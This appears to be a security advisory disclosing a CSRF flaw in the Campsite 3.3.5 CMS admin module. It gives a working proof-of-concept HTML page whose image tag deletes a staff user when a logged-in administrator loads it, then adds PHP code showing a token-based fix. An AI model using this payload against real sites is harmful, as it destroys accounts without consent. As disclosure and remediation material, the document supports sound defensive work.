=======================================================================

Campsite 3.3.5 CSRF Vulnerability

=======================================================================

by

Pratul Agrawal

# Vulnerability found in: Admin module

# Email: Pratulag@yahoo.com

# Company: aksitservices

# Credit: Pratul Agrawal

# Category: CMS / Portals

# Site: http://www.campware.org/

# Platform: PHP

# Proof of concept #

Targeted URL: http://server/admin/login.php (the victim must be logged in to the admin interface)

The admin module carries out the staff-user deletion on a plain GET request to
/admin/users/do_del.php with nothing tying the request to the administrator's
own intent (no anti-CSRF token), so any page an authenticated administrator
opens can trigger it. The following page deletes the admin user with the given
ID through cross-site request forgery:

. ..................................................................................................................

<html>
<body>
<!-- Loading this image fires a GET to do_del.php with the victim's admin
     session cookie attached; replace [userID] with the ID of the account
     to delete -->
<img src="http://server/admin/users/do_del.php?User=[userID]&uType=Staff" />
</body>
</html>

. ..................................................................................................................

Host this page and have a logged-in administrator open it. Afterwards, refresh
the admin user list: the user with the given ID has been deleted, with no
interaction beyond loading the page.

# If you have any questions, comments, or concerns, feel free to contact me.
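The fix a practitioner would want next to this PoC is the check the admin module is missing. The PHP below is an added example, not Campsite code: vulnerable_do_del() reproduces only the behaviour the PoC exploits (deletion on a bare GET carrying User and uType), and the hardened version accepts the action only over POST with a per-session token compared in constant time. The function names, the delete_user() stand-in and the session key are assumptions for illustration.

```php
<?php
// Added example, not Campsite's code. The request parameter names User and
// uType follow the advisory; the function names, the session key and the
// delete_user() stand-in are hypothetical.

session_start();

// Hypothetical stand-in for the application's own deletion routine.
function delete_user(int $userId, string $type): void {
    // ... application-specific deletion ...
}

// --- Vulnerable pattern (sketch of what the PoC exploits) -------------------
// Every request that arrives with the administrator's session cookie deletes
// the user, so a cross-site <img src="...do_del.php?User=N&uType=Staff">
// loaded by a logged-in administrator is enough.
function vulnerable_do_del(): void {
    if (isset($_GET['User'], $_GET['uType'])) {
        delete_user((int) $_GET['User'], $_GET['uType']);
    }
}

// --- Hardened pattern --------------------------------------------------------
// 1. Issue one random token per session and embed it in every admin form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// 2. Accept the destructive action only via POST and only with a token that
//    matches the one in the session. hash_equals() compares in constant time.
function csrf_verify(): bool {
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        return false;
    }
    $sent     = $_POST['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && hash_equals($expected, $sent);
}

function hardened_do_del(): void {
    if (!csrf_verify()) {
        http_response_code(403);
        exit('Invalid request');
    }
    if (isset($_POST['User'], $_POST['uType'])) {
        delete_user((int) $_POST['User'], $_POST['uType']);
    }
}

// 3. The form the admin UI renders. The attacker's page never sees the
//    victim's session, so it cannot supply csrf_token, and an <img> load is
//    a GET, so hardened_do_del() rejects the PoC on both counts.
function delete_form(int $userId): string {
    return '<form method="post" action="/admin/users/do_del.php">'
         . '<input type="hidden" name="User" value="' . $userId . '">'
         . '<input type="hidden" name="uType" value="Staff">'
         . '<input type="hidden" name="csrf_token" value="'
         . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">'
         . '<button type="submit">Delete</button>'
         . '</form>';
}
```

Requiring POST alone is not sufficient, since a hidden auto-submitting form on the attacker's page can issue a cross-site POST; the unguessable per-session token is what closes the hole. Checking the Referer header instead is a weaker substitute because the header may be absent or stripped by proxies.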